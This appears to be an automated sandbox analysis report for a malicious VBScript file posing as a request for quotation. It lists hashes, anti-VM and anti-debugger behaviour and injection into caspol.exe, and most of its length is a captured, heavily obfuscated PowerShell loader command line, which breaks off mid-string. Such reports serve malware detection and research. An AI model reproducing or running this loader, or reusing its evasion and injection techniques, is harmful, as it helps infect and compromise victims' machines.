Analysis
-
max time kernel
149s -
max time network
41s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
06-12-2022 07:01
Static task
static1
Behavioral task
behavioral1
Sample
RFQ No. 109050.vbe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
RFQ No. 109050.vbe
Resource
win10v2004-20220812-en
General
-
Target
RFQ No. 109050.vbe
-
Size
599KB
-
MD5
f11778cbde51d99c01d187b8a606b6c2
-
SHA1
2ac169a3b9237a3dd5525a95b1712b690329757e
-
SHA256
9ad8dc0946dc335ebe8487c8dcd9d352a24fd2ca8655bad38f476d57d5232f86
-
SHA512
80b47960a21f0be15fe496adaedbaa47deae992848cd8dc25199d55d519346cffc5cf07b8fabf45ef154048bbe0eb57144f3802cef64191e59de7718f529f3dd
-
SSDEEP
6144:RlBnkjE4CJiP4RdKkDSlVciFCGGnzQhbIkY+PGZjjb3WabtHnatinzzVMce0NVnT:RvnkjCIPi/DSl6KWkYjiywg3VMM88oEb
Malware Config
Signatures
-
Checks QEMU agent file 2 TTPs 1 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
powershell.exepid process 860 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 860 set thread context of 1876 860 powershell.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 1200 powershell.exe 988 powershell.exe 860 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 860 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 988 powershell.exe Token: SeDebugPrivilege 860 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
WScript.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 1928 wrote to memory of 1200 1928 WScript.exe powershell.exe PID 1928 wrote to memory of 1200 1928 WScript.exe powershell.exe PID 1928 wrote to memory of 1200 1928 WScript.exe powershell.exe PID 1200 wrote to memory of 988 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 988 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 988 1200 powershell.exe powershell.exe PID 1200 wrote to memory of 988 1200 powershell.exe powershell.exe PID 988 wrote to memory of 860 988 powershell.exe powershell.exe PID 988 wrote to memory of 860 988 powershell.exe powershell.exe PID 988 wrote to memory of 860 988 powershell.exe powershell.exe PID 988 wrote to memory of 860 988 powershell.exe powershell.exe PID 860 wrote to memory of 1876 860 powershell.exe caspol.exe PID 860 wrote to memory of 1876 860 powershell.exe caspol.exe PID 860 wrote to memory of 1876 860 powershell.exe caspol.exe PID 860 wrote to memory of 1876 860 powershell.exe caspol.exe PID 860 wrote to memory of 1876 860 powershell.exe caspol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ No. 109050.vbe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Acopyrin = """OvFScuLunChcDitSuiBeoInnHa ChHDiTCuBBa Fl{Ca Br At Se BipUgaRarGaaNomTr(Fa[VaSfltTirPriBonUugRn]So`$PlGFoaSplprdEseOmbHurRerEleGenOveLa)Ph;Ol Po Ra Pu Al`$SlTIsiGalHesRetOveSgdNceKavBarMeeAanbudSieHasUn Pi=Al KiNgyebewYo-AcOCibTojHyeKacFatHi FobDiyChtFoeSp[Kl]ov Yo(Be`$PlGKnaRelPodFleInbUnrHurUreStnSpeHa.SpLSeeVinRegMitUnhpo Ti/Je Sk2Me)Ac;De Va Pr Sh fiFNuoFyrVe(Mo`$HaJPoeMiuNunPoeCrsIn=ko0So;No Bi`$SkJKoeOpuJonLaeDasDe In-ArlUdtJu Ma`$BoGKraNdlModObeNibLirPrrEneJunVaeNo.PoLGyeOenPrgNatCohPl;Sa Un`$FoJAnetruSonRaeCesEv+Te=Sa2Fi)Su{Re as Pr in Fo Ve Ba Nd To`$MoTOuiSclLosTitSteOrdCreDevHarVeeGonRedVieAfsKl[Ma`$CuJFyePauMynSteUnsLa/fa2So]To Ar=Fl ny[GncSpoFonSovqueWarSitUn]Wa:Be:beTCloNeBFayPrtAleSk(ba`$SkGAlaInlPodTieFrbTerBerReeClnWoeLy.VgSlouUdbFesJotLerTaiErnMigSo(Hy`$BiJabeKauConSmeBesBu,Fo Rg2Ta)Sl,Bn Af1Bo6Se)No;Sa In Ov`$HaTOliPolStsSotsueFrdVeePrvBarBieInnAcdPoeBnsAc[Ko`$BaJVieMiuFonKaeBosUk/Bi2Ho]Ho Kr=An Ri(Fe`$AfTDiiMelIlsMetAfePadBoehivUnrAneHenVedBeeunsBe[Tu`$BeJKoeduubanAleDasLy/Sq2Ne]Po Ph-MibSaxPeoXirMe Ge1Ap2Ab1En)No;Yo Ko Ta Gl Ko}Br Au[FaSLotGarIciUnnKngSk]Ps[BaSAaySesDetUteMamCl.ToTBoeWixsitUp.PlErdnGacagoOvdDeiGanSkgFa]Bi:Ma:JoAThSCaCPoItrIEx.UnGEmeUntBeSsytpjrTeiPinRegMa(Ga`$HeTSpiBrlSnsBitDyeThdbleChvLurdeeInnJudHoeNysSy)Bi;Un}Sk`$ZoQMouChaCorTe0Me=KiHPrTSuBGr By'Ou2YvASt0An0St0FiAMi0BiDGo1UbCTh1Sh4Le5Un7Re1TrDFu1Be5Na1Fe5Sp'Bl;Ko`$ReQCautbaasrIn1Ma=SeHViTMaBTh Gr'Vi3Sa4Kl1No0Op1ZoASa0liBNi1Ov6Ud0AfASh1Ly6En1UdFNe0UnDBa5Pi7Lu2MuEMa1ri0Pe1Sk7Ry4MiAPa4FrBUn5Ho7Fe2foCAf1Ji7Re0ElAKo1Pa8Un1MeFMi1PoCLy3Pl7Di1Ab8Sa0BoDme1Kn0Ud0EnFBe1inCPr3op4pl1EtCVe0FoDSu1Fo1Sa1ek6Pr1SeDMu0MaAUd'Ro;mi`$KoQUnuKiaUdrBi2Ac=HeHbeTDrBSp Di'pr3DyEOb1toCId0maDGl2Op9Sp0InBIn1Ar6Un1PaAPa3Jo8Re1AmDSp1DeDDi0ClBko1OpCUn0CaAIm0BeAFo'Ma;Lo`$SeQSauFraEtrHe3Bo=MeHPeTOvBEx In'Mo2KaAFo0Su0Du0LoAGi0TeDPl1InCUl1Fo4Pu5Ma7Ne2HeBPa0FrCCr1As7An0ArDJa1ca0Be1Ep4Su1unCTe5re7Hy3Un0Vi1Du7Fn0IdDDy1FeCSe0PrBFe1Ma6Vo0Me9Re2AnAOb1weCNi0AcBun0InFpa1Co0Ma1unAFl1GrCAr0BeAWh5Ra7Fl3Sk1As1Hv8Ec1dr7Ga1TiDCe1Re5Su1fiCac2UnBMa1FjCKw1TuFKe'An;Wo`$neQSnuAnaBurSt4ty=CeHLfTSaBUn Vo'Su0RaATe0BrDVe0InBBu1Et0Du1Li7Mi1ErEAl'Ne;Fr`$StQVruBoaIsrfo5Bl=MaHBaTFeBhe De'Ja3paEUn1PlCqu0woDAc3An4Fl1Th6St1UnDBe0KsCSy1ar5Un1InCMa3So1Pr1Re8Do1Sk7Af1GiDUn1Ut5Mi1KoCRe'Au;Fe`$FaQTeuJyaMorBe6Ce=TiHBrTMiBfo Tr'Di2AfBLy2UiDBl2PrAIn0Su9se1toCKo1AlAHi1Ga0Fi1Ls8Hj1Kr5Da3Ra7Pr1En8Sk1Ga4Ob1InCPr5Ar5Lu5Dg9Sa3Ov1sp1Ph0Co1UdDTa1MeCSa3TuBin0Sk0Br2StADi1sm0Ud1UnEOr5Sa5Gr5Py9Fu2Ev9Sy0piCVa1AdBDe1Re5Op1Ba0Ap1ObAFe'Co;Pa`$RoQRiudiaLrrSk7Sk=AcHHyTOxBSm In'be2BaBFo0CaCFa1Ki7ch0LyDHu1Ch0Ar1Sy4Ru1NaCUn5se5Po5Ak9Po3Ca4El1Fo8De1Ma7Ok1Do8gr1unEPh1goCSi1OpDPi'Ma;Li`$AlQInuaraInrSe8Pi=ApHJuTCaBTw St'St2PhBDr1DrCtr1ApFPe1Ma5Sl1FlCCu1spAEn0PeDFo1CiCSc1GaDEk3StDTa1DeCTe1Ge5Ov1ReCKe1FaEMo1Um8Bo0SoDso1BuCAg'Sc;Sy`$BrQakuVoaUnrPh9Re=soHMoTArBFa Ad'St3Ga0Sh1Fr7Su3Em4Ko1TeCAk1In4ja1En6De0PaBPa0Pr0Wa3Bl4sp1De6Un1FoDFi0klCMo1Kl5Ra1BrCVe'Go;Ap`$BaAOrrbamseeRekTaoPorTrpNesSlsIn0Ba=KoHEmTBiBKh Da'To3Di4Th0In0An3FoDSp1DoCSc1Ma5Ch1moCRh1ReESa1Pr8Cu0ToDSt1NoCfj2GyDar0co0Na0Ci9Se1GeCAb'Ud;Sy`$BiAAnrTrmTuesekHioInrAtpSpsOpsOv1ag=UfHKoTEnBGa Un'Sh3AfASt1Be5Wa1Re8Fi0OrATr0GaAGr5fo5Sa5Ud9En2Sl9Su0DiCLs1StBsk1Un5Co1De0Gr1AnAMe5Ro5Ar5St9Ci2AnALe1TrCWa1Ga8Fr1Fr5Pr1LaCAr1CuDHa5Ru5mi5Mo9In3Mo8Ge1im7Ge0ReATe1Ko0Sm3AcADa1Fo5Ho1Ki8Un0MeATa0ReARd5Ak5Pr5Qu9Po3Su8Ta0OlCPh0KvDFe1Do6Bl3GrABo1pa5Fr1Co8Fr0HaALa0InASl'Te;Fo`$WaAsprTamPrehokUnoKerMapRasHasPe2ta=TuHMiTScBGa Mo'Fo3Ad0Ou1Yd7Tr0SeFUd1By6Bu1As2An1KuCSp'ui;An`$ReAAsrRemKoeenkDioCorMepSesscsDe3Sa=ReHBaTBoBRi Jo'to2Da9In0FoCUs1ViBCh1La5Uf1fr0St1SeAPe5Ou5Ak5Tr9Bl3Li1In1Fi0vi1FoDUn1OgCPo3AuBCa0No0St2WhAAm1Ho0Ch1SeECo5pl5gr5Ki9Ot3Un7Un1EnCTr0FrEIn2BrAEl1Co5Sc1Ty6Lo0LsDCi5St5Ge5On9th2PoFPi1Un0Co0PoBPe0efDIn0SaCSa1an8Di1Wa5Be'Sa;Sy`$TrABkrRemNoeBrkraoSlrHypKrsCysSe4Ma=MoHSiTVaBfo De'st2beFUd1su0we0PrBIn0ShDRh0ReCBe1Do8Hu1Sl5Ko3Va8Ce1Fo5Sl1Ra5me1se6Sk1FaAEn'Ac;Ph`$CoATirwimareShkUdoInrFapHisKasAf5Be=VrHDaTLaBPs Fl'Bo1He7fu0CrDUn1HeDUn1an5Iv1Co5Wa'Am;Do`$DeALerErmSoeFlkBloCrrUfpKasxisFi6Fo=SyHMeTGaBAk Sp'Us3Re7Pa0HaDBi2Pr9Ge0CoBAf1Mi6Qu0EvDGe1TeCCo1PrASk0SoDAn2UnFty1Se0op0ScBDe0BoDSu0BuCUv1He8ca1Fr5At3Ar4In1SeCHa1Ch4Mi1Te6Cl0CoBMa0Ta0Bl'Si;Bl`$LeASarRamVeeSvkAfoKrrVepAfsBusCo7Tr=StHAdTGuBTo Ab'Bi3Ar0Fi3FoCRi2Ci1Sk'Sy;Di`$FlAAtrRdmHueRukScoOprRipPesNysCo8Wo=DoHBaTSeBSk be'Sv2Vk5ch'Ca;DefIkubinBicKitUniChoDinMi CafPikdupSt Un{DyPShaInrEyaStmAl Sn(Ko`$ReVViititLnaAklBriResKaeDa1Ma1Dr8Sp,Ic St`$BrKPrhAmaLotKarVaiSk3Lo8Br)Ed Da sk ar Fe Ce;cu`$FiSUnePrdprutalSvoDauJosTe0Na Ud=CeHImTTeBSy Re'pr5LdDco1UnBEf1Ev6Lu1Ha7Do1ciDBa1TaCCa1LiFNr1Sl8Eb1Ja7Rg1ThEDd1HjCpr0PrDAt5Ca9Sp4Fy4No5br9St5An1Ri2Fi2Fa3Di8Je0Be9un0Ac9Th3GeDCy1an6go1Vi4Ma1Ar8Po1Mr0As1Ma7Gi2An4Di4Fo3Ma4Su3Be3StATa0AkCGr0ReBla0juBun1CyCBe1Ga7Te0ArDSp3BaDMa1Sc6Ch1Me4Br1En8Vi1Yo0Em1He7Sl5Sl7Sk3neEEg1ReCAu0ejDSu3Be8Op0PiAHa0MaAPa1FiCpa1Ko4Re1SeBDr1su5rs1He0de1ApCEr0InATa5Dr1Br5Gu0Fe5Ka9Au0Ci5Ba5Ha9Du2KaEUp1Fo1Eg1DyCSc0BnBAf1diCNi5Af4Ol3ve6Sk1CrBRe1In3In1HaCKu1SqAWi0CaDUn5Or9Ov0Pl2Pu5Ab9As5stDDo2Ca6Mi5Un7Un3EdENy1de5Bo1Ge6Li1EnBNo1Au8Ri1fe5Ho3Pa8ho0LrASa0CaABl1DeCud1Gr4Sk1SnBIn1Se5Po0ep0Ta3IcABj1Tv8At1TrAFr1tr1Da1ReCMi5Un9Hi5fi4Fo3Kv8Da1Be7Pr1TrDIk5St9Ti5FoDHe2Bl6Un5Du7En3Ma5Co1Cu6Ud1MiAEx1Ne8Hi0noDLe1No0Pr1Sv6Ma1Ur7Qu5Di7Ke2ToAMe0Sp9No1Ng5So1Mi0Ch0ToDru5Sl1Sk5NdDPr3im8Pi0AlBOm1Sk4Su1SeCHa1Cy2Sy1Aa6Bo0GaBDi0Wa9Pr0SpATe0esARe4Un1Su5Sk0Fe2En2Ty5Pr4Gr4te8Ch2St4Em5Un7Eb3BiCPr0St8Ra0DeCFr1Fo8Re1Ec5Ra0ViABl5st1Fo5PeDMi2Pa8Ba0StCGe1Pa8Sq0IdBNs4Re9Ca5Co0Ba5Sv9Ud0Pr4Le5Ud0Su5Sv7Sa3InEDe1TiCPi0RuDOp2DeDLi0In0Ek0Sa9Fa1UnCTa5Do1Ci5ReDan2Cr8co0ymCKx1Ge8Sv0BoBUn4De8Ko5Ud0Un'Ta;Pr&Th(Ba`$HeAStrcomAneTikBeoEprWhpAusPasCo7Do)Kl Po`$VaSByeBedBeuIclPuoNouDisBi0As;Tr`$nsSPrefadHeuOrlBeoCouDdsRe5Sp im=An BeHFaTPsBSe Ru'No5BaDEb3Pi2Me1HdCMi0whDBo1PeAfi1ov1ts0ToCPs0Ha9tr0te9Un1TeCAl1Sy7Du0PoACy5Ra9vo4hj4Ha5Un9Mi5AlDMi1MeBNa1Sa6Ap1Li7Se1fyDSu1OvCtu1SaFAn1pr8Ko1Ha7Pl1elESo1stCFi0SoDUr5Mu7Pa3WeEPi1FuCNe0ChDCo3Sl4Ad1NoCGr0CuDPr1pr1He1Zo6la1VrDMe5Jo1Ak5FiDPa2An8Ac0BaCHe1Va8Ze0BaBSk4OvBSe5Ha5Pa5Ma9vi2tr2Li2KlDAp0Fr0Fe0Co9Pr1BaCBe2Mi2Pr2Bn4Es2In4Sp5Ej9dr3Re9Je5Co1Un5StDCa2Ba8ve0ToCLu1Ov8Po0PaBDi4SoAUd5In5Bl5Ma9ps5CeDRo2Sa8No0BeCAn1No8Fo0SaBRe4SuDAn5di0Sa5Od0Ha'Aa;Fe&Au(Nu`$TiAAnrHomKveBlkSkoJurNepObsUnsSe7Ge)Ar Sn`$SnSPeeTadRauEmlKdoUnuMlsLe5De;Ur`$TeSTeeFrdInuRelHeohyuMassv1Sk Ma=po JoHLbTFoBad Ab'St0StBfi1SyCMi0PaDBi0DaCKi0AmBGl1Tr7Ne5se9Pu5UrDOi3Ar2Re1ClCMo0VeDBl1HiAUn1Sa1Ud0OvCHa0Su9Un0ap9Ta1MeCCy1Pr7Tr0SkABa5Pr7Te3De0Se1Fo7Fa0TrFSt1Cu6Ti1Su2Mi1AmCAf5Re1Pa5FrDLo1Fe7He0OpCSi1An5Au1My5Ex5ca5Re5Tr9Ma3Fi9Ud5Pa1Pe2St2Tr2AfAFo0Fi0To0ClARe0StDPo1GoCAl1re4tr5Pl7Bd2PrBDr0veCFo1Br7Mi0EtDKo1Li0Sp1lo4Pr1DaCPo5Ud7Co3Ar0Kn1In7Ma0spDSk1GyCCa0GaBHe1Ha6Gr0Ar9De2KoAWi1SkCfl0riBIn0FeFIr1Fo0Re1BaAUb1StCEp0SpASa5Ru7Se3Co1tr1Wa8Ri1Ud7bl1ViDsy1Sn5Ab1BuCSr2UnBSk1MaCBe1TeFTr2St4Bo5Li1Mi3Mo7Gu1RiCfr0EuEga5Sa4af3Sp6Sp1AlBIs1No3No1OpCSi1InASt0KnDSt5Ph9Ju2ToATe0Ex0Ps0DiAUn0GeDCo1PoCCh1Gt4Mi5Un7Va2UiBFr0KaCGo1Fo7un0RhDAv1Al0Sm1Cl4St1ShCLi5Mo7Gy3Fi0We1Un7Sa0SaDSp1beCSy0TaBKl1St6Pa0fo9St2EtAUn1FoCdi0InBKi0MaFDo1Dr0To1PoACh1OrCRe0OvAFe5cu7Su3Ca1Un1Fl8Fo1No7Fo1GaDfr1Ca5Fr1AfCau2SeBun1CaCGa1beFDi5Op1Vi5Ti1Ka3Un7Cl1VaCSk0AfEEl5Re4Af3Af6st1InBBe1Bi3Pa1ReCKe1NeAUn0BeDsc5Fr9Pa3Ma0Mo1Ba7ch0OfDNe2Sa9Fo0MeDGr0SjBPr5Ci0Ra5Il5Al5De9Mi5fi1Ra5NaDDe1FlBPo1Br6Ba1Bu7af1AsDHr1AtCHe1ReFsu1Pr8El1He7en1KlETe1EnCIs0RaDBl5Re7Fu3MeEAb1BrCFo0VrDFo3Sc4Ca1InCLe0CoDAt1Hi1Ha1Pa6Sn1FrDBi5Sp1Se5HeDTa2Ro8Un0BiCTa1St8In0saBSk4StCFl5Ga0Ci5Ba0Sc5Ko7Am3Am0Me1Hi7Ad0AsFAr1Be6Fo1Va2De1GoCVi5Be1Sa5OvDFi1Do7Fr0MoCBu1Re5St1De5Ve5Ar5Nu5Co9Ou3Da9Pr5ek1Su5PrDFl2OcFfa1Ve0Rh0NaDKr1Ma8Sl1Tr5Ke1Ob0Rr0RaAun1trCSt4Mi8Ne4sy8Sp4Ar1Fa5Il0Hi5Bi0Ps5Sh0Fo5Ja0Yg5Ci5Kl5Ai9Ph5SwDMe3Un2In1No1Ud1Di8Ad0BaDPa0svBBi1Tr0Dr4UdAEu4Ko1Zi5La0Su5Be0Ps'As;Ta&Mi(Fu`$AbAHerlimGsePekGroParSppunsAnsuv7Ef)My Mi`$UdSFleGldGnuLilHuoChuAvsFr1Ph;Un}defdauglnFocBytFoiopoFrnCa PhGBiDIhTBe Ul{ToPSkaMerBeaDimBr Li(Ly[PiPPeaStrOcaRemFaeMatNoeKlrKo(pyPQuoflsHaibetCeiSuoStnno Ap=Sm St0Fo,Fo DeMAnaBrnVedDeaCatdioRerPoySt In=De De`$HeTArrVauYaeSk)Re]Ov Ji[StTFiyDupMoeBl[Pe]Ro]Ro No`$toCAriRegAlaBarAtePhtPotTeeWarSlsUd,Ny[SyPUnaNerPlaBemAjeVitUdeBerTr(PePSaoUnsStiPrtHoiEloalnMe La=An Ma1Ce)To]Iz Ch[BoTLiyBlpcoeEx]Et Th`$CiOJavHaeAlrDucCooStoGilBe Em=Za En[FrVFaodriCodBi]Bl)em;Lo`$FoSDeeDadBouOrlUnopauEksPt2Re Vi=lg StHHeTTrBEs Ef'Fo5ReDTe2JoASk0CoCwi0Fi9Yv1KoCSc0saBBl1UpFBi1De6St0HeAAb1MeFSt1Sa8Tr0edDTr1ClCDo0SmBSk1fa7ma1SkCsm5Ro9Da4Ja4Eg5ta9He2Di2Ph3Bi8Co0Pt9Bu0Va9Do3ErDBa1Un6Pi1Lr4ve1Vi8Ut1Fo0Ur1Al7De2Ou4In4Oc3To4Ae3Co3PoASt0SaCFi0FoBTh0ruBMa1arCRe1Gi7bv0DoDCh3SeDFo1Ge6Ny1ro4Pl1Fr8Sk1Ni0hn1Ul7Br5Sg7No3AnDKa1CoCDo1PaFNo1Fo0Fo1Ha7di1PaCRa3ReDOu0Mo0Go1Be7Fr1Ob8La1Fe4Ga1vi0Un1KpASe3Ta8Co0FeAst0RsAJu1ScCre1Ig4Re1PoBTo1Pr5Fa0Hu0Re5Sn1Sp5st1Re3li7He1LaCKo0heEMa5Sp4Wo3Kn6An1HiBMo1Po3Fl1DiCAn1CaAPo0UnDBe5Ub9So2KdAMi0Fo0St0FrATr0SaDOp1MuCRe1Ke4St5As7An2AuBSy1MeCGe1SyFHu1Re5Ug1brCEf1AnAse0DoDFe1Dr0by1Ki6Un1Hn7sr5Vi7Fr3Fr8Te0LaATv0saAUd1coCCo1Af4Di1FaBno1Ap5Sp0Fo0In3En7Fl1tr8Ti1Wa4Lb1EkCUv5Ga1Tu5KdDIn2Br8Ht0moCAf1Re8Ju0FoBDi4Br1Er5Ko0Sh5Fo0El5Fu5ns5fl9Fe2Ho2An2EvAKa0Eg0Sn0TrAEn0YpDSy1ViCVu1Ho4Dy5Tr7un2KnBTr1PlCAn1FlFPl1sp5In1DeCBo1PaAIn0FoDLi1Vi0Ye1cr6Ne1Fa7In5Mi7St3UnCfl1Re4Af1An0Ta0AnDSv5Ba7Fo3Rg8Fl0PoABe0StATu1WhCIn1Ma4Pr1InBRo1ov5Di0Ty0Gy3hjBIn0BaCPr1To0un1Qu5Ja1TrDBl1RiCap0FoBDr3Tr8Kl1FaAVi1KaASu1LuCen0OrACa0prAAr2Yp4ef4El3Kl4Va3Pa2ReBEm0GrCRe1Da7Va5An0Aa5Hy7In3VaDTi1KmCme1TeFKe1Op0St1De7Pa1SkCFr3RiDfa0Sa0Un1Ge7Af1Du8Bu1Ra4Pg1Br0Ps1GoAsk3Pr4Re1Gu6Sp1OvDvu0BrCDe1Uf5Ud1AfCMu5Dr1Tr5PrDWh2Vr8Ph0ApCLa1St8If0UnBKo4er0Si5Sk5Br5gr9fr5BiDEf1PrFTe1An8gr1Be5Rh0haASk1FrCJe5Be0Un5Pa7El3RuDVi1PoCCo1VaFMa1Un0Ce1Bl7Un1NuCVn2GuDox0Mg0Co0Pi9bo1skCFo5Ka1St5BrDTr3Sc8Lu0JiBFo1sa4Tr1AeCSk1Dd2qu1Vi6un0JaBNe0Hu9Su0VrAFr0noANo4Sa9Ti5Ho5Pa5Sp9te5LfDPr3Fu8Op0MiBSu1Pr4Do1UvCMa1Sp2Di1Br6Me0AbBRo0In9Re0NaAFo0ReAef4An8So5Al5tr5En9Mo2di2Le2WaAJa0An0Ja0MiAMi0DoDPa1SpCPl1Su4Mi5Un7St3Un4Sm0ToCSt1Un5Un0PaDIn1St0Im1AlADi1Co8Pr0SiAba0SuDFi3OvDUd1DuCVi1La5Bl1NeCSy1RaEPr1Ve8So0UnDSl1FaCUn2Ud4Ta5Su0Un'Bu;Hi&No(Sk`$SuAUnrFimIneNakUdoRirPjpSosSpsIs7St)Du Or`$PlSReehudFouStlHooKlutosRe2Is;Tw`$AfSDieUldPauTolTropluScsPh3Av Ka=Or CoHgeTOxBSl Fo'Ar5UnDPh2ReAUn0FoCCi0Dk9Fe1AsCSp0NuBHe1PlFMi1Ko6Sk0FlATr1EnFHe1Be8R 0VaDSa1SmCdu0NoBSa1Da7Mc1udCBr5Ri7Ti3udDVa1RgCMe1NoFIm1af0Uv1Af7Dr1PaCSy3BrAIr1ep6Su1Ph7na0BrAil0ReDBe0crBAm0SpCDs1CaAun0ClDdi1Av6Ps0DaBMu5Gl1Sp5McDAt2No8Pr0SlCUn1Dr8Rk0InBCu4BeFMi5Py5Sh5Ch9Sh2No2Al2ReAun0Pe0Fe0EnAAs0BiDBi1FoCSn1Or4se5In7sl2YnBsu1AnCPa1SkFTr1Lu5Ls1CoCHe1FrAFu0PrDTh1Pe0Qu1Or6Sl1Ep7fl5Ru7Le3PhALi1Th8re1Pe5Si1Bo5Va1Ca0Un1Un7Me1PrEDo3boADo1Th6Sp1Sp7Ci0FlFCo1FiCLa1Pr7Jo0HnDRo1An0Su1Ka6Ha1Sa7Kl0UtAIn2pe4da4Ea3ma4Al3Ce2ToAAe0ThDAm1Ma8Hr1Be7Ra1BaDFl1ve8pa0TwBBa1laDAm5En5Ke5Su9Ph5TuDNe3DrAsu1Pa0Bi1MaEMe1Or8Br0SlBco1HiCUn0AiDOp0OvDAb1PoCBo0SiBDi0StARa5Ua0pl5Co7Tr2CaAHe1FoCHe0AcDRa3Ta0St1Tr4Se0Ci9Ag1Kl5Ov1KoCHe1Me4Sa1MiCLa1Sm7Me0ArDFo1Ro8Fl0HuDDr1Ra0In1Fa6In1Vl7De3ooFti1Be5My1Al8Ko1BlETu0ClAMi5St1Su5muDKi2Lo8Op0ErCpe1He8Vi0SuBko4NoECa5Co0Bl'Pi;So&Em(fo`$PaANorWhmunePhkOpoHyrFopSassasLe7Cu)Re So`$MiSBrepldSouBelsvoDiuCasTh3wr;Le`$KiSEneFodNouBulOkoAfuFasEn4Bl Ru=Pl liHItTStBSt Sn'Bu5MaDPu2EnABu0caCKs0Th9Sa1DiCKo0SyBWh1MaFLa1Ko6Il0CoABe1EnFKo1Op8Ba0FrDAi1UnCSp0UdBUn1He7La1SkCKe5Ko7Br3QuDTa1ArCme1beFHa1Sy0Sy1Re7St1FoCpr3Ap4To1feCMi0AlDJo1Br1Po1En6Us1GaDCe5Se1Fa5EjDPa3Wo8Fu0BaBSe1Fi4ud1TrCPl1An2Ti1Ko6Su0efBFo0Ex9Pe0PlAOl0RaAKi4MaBSu5Ov5Ev5Sn9Pi5OvDBu3Ra8Ko0UbBAf1Uv4Sk1FoCUn1Si2Ha1Is6Ma0MeBUn0Ka9Ex0TeAGr0ExABj4SkAts5Kf5om5un9Fi5ArDMe3Ek6Me0CoFPy1InCHj0ShBop1FoAda1Be6Co1Va6In1Fl5Un5Be5be5ga9Do5AlDTr3FrALo1Ud0Fr1VeEPe1La8Ev0PlBPa1GrCUn0unDUd0GrDKo1AlCRe0PeBPr0SuACo5Sv0Ac5Sc7Sa2BlASp1PrCHo0UlDOv3In0Ci1Ti4St0Ss9Uh1Ad5ac1GrCRe1An4Tr1AnCEf1Ke7Da0SaDHo1Th8Th0AmDPe1Kr0Sl1Ti6St1Uo7Li3SmFHy1Op5In1Ep8So1LaEBa0ScADu5Ga1Gg5SyDTi2Pa8Ma0NiCEk1Fo8Cl0MiBTh4PlESk5Tr0be'Sp;Sk&Or(Re`$unAKorAamspeKnkTooArrinpBesStsSp7An)Mo En`$MiSGieMudNouBalPeoAruTasPa4Ac;Ep`$HvSDeeSudOkuUnlUnoPuuChsAs5Sa Un=Ja BaHyoTBoBLy Be'La0LiBSp1EoCEx0FeDOl0GlCBr0RuBAm1Un7Fi5Lt9Sy5jeDha2SyAHi0TlCMe0Po9Ba1BoCta0LiBBi1ViFFi1Pa6Ve0DeAKa1QuFsk1El8Ba0UpDDi1FoCGa0SkBBe1Af7ri1MeCDa5Co7Tr3EnAUn0SuBSy1AnCTa1Pu8Sp0UtDSi1MiCNo2TwDEp0No0Me0co9No1OrCTi5Fe1to5Ti0No'Fr;In&In(Su`$VaAsorSfmAkeEkkAroSordopUnsAusch7Fo)Af Ek`$DiSEneSedUpuTalDeoChuAmsEs5Es Ga Pl Th;Br}Sn`$AnRSpedicAleElsSlsLaiBroOnnLbeBerHe We=Pr VeHSkTChBIs At'Bl1Cu2Do1ScCFl0OuBTe1St7He1TrCHa1Un5Ma4suAKa4AnBRe'Sc;Ci`$DiSBleopdSiuFilMaoAuuOvsar6pr Ab=Be MoHInTGeBSt Is'Ds5ObDTu0SoBSy1Ca1Mi1Ve8Ti0EuDSy1Au8Tr1Di7Bi1pe0Fr1AaCbr0TaAGe5Be9De4Qu4Te5He9sk2Ni2Cr2PoAly0Fr0Ko0FlAHa0PrDOm1BaCMa1Gk4Af5Sp7Vr2TrBOv0EgCKa1Th7Sy0MoDLu1Ph0Ps1Re4Sa1OvCSc5La7ca3Pa0Wi1Ov7Sy0shDfi1PhCKa0PeBCh1Un6La0In9Sn2PaACr1UdCCa0KnBFa0EvFTy1Re0Br1SaAAn1ScCCa0DkABa5Ha7Ga3ti4Ek1Sa8No0InBFr0EfACo1Pe1Le1Fa8Kl1Ju5Wi2Uo4Fi4Mo3Po4Sd3Gl3HyEfr1FrCFi0RaDVa3JoDEp1PrCGu1Da5cr1AgCEp1FrEBi1Bl8Af0TeDud1FoCDe3GoFWa1Gy6Un0SaBOd3UsFdu0BrCAn1Mu7Si1DiASp0CrDWe1Re0Ta1Ku6Eb1In7Di2Ig9Re1Be6Bi1Re0Ch1me7Un0AmDAn1PlCLe0UnBIm5Ti1Re5Ka1Ko1TvFIm1re2de0Ts9Le5Ga9Fr5deDTr2DdBIs1StCse1GiAUn1KaCMe0TaAIn0BeAKi1on0Ci1Ad6Dy1Re7at1GaCCi0DeBDu5Mi9Cu5AaDKw3Gr8Se0diBHa1me4Ca1DeCFo1Ma2Ud1Fr6Ko0SuBeg0Ov9Av0EnAKo0BeAFa4TuDLa5Gr0Me5In5Zo5Ma9Bo5au1Un3BiEOl3NoDdo2DeDGr5co9Ca3En9Ig5Ta1Br2Bl2tj3ge0Bk1Uv7Vk0DuDLi2Pi9De0HoDLu0noBPh2Ko4Me5We5Ko5Ro9Ku2Va2Va2UnCGo3Sa0Aa1Te7Fu0SyDpa4DeAGu4CeBMi2Ka4Lr5Ca5Ku5Ba9Im2Ha2Fo2PaCRe3Ko0No1De7Ta0EnDPu4CoACo4G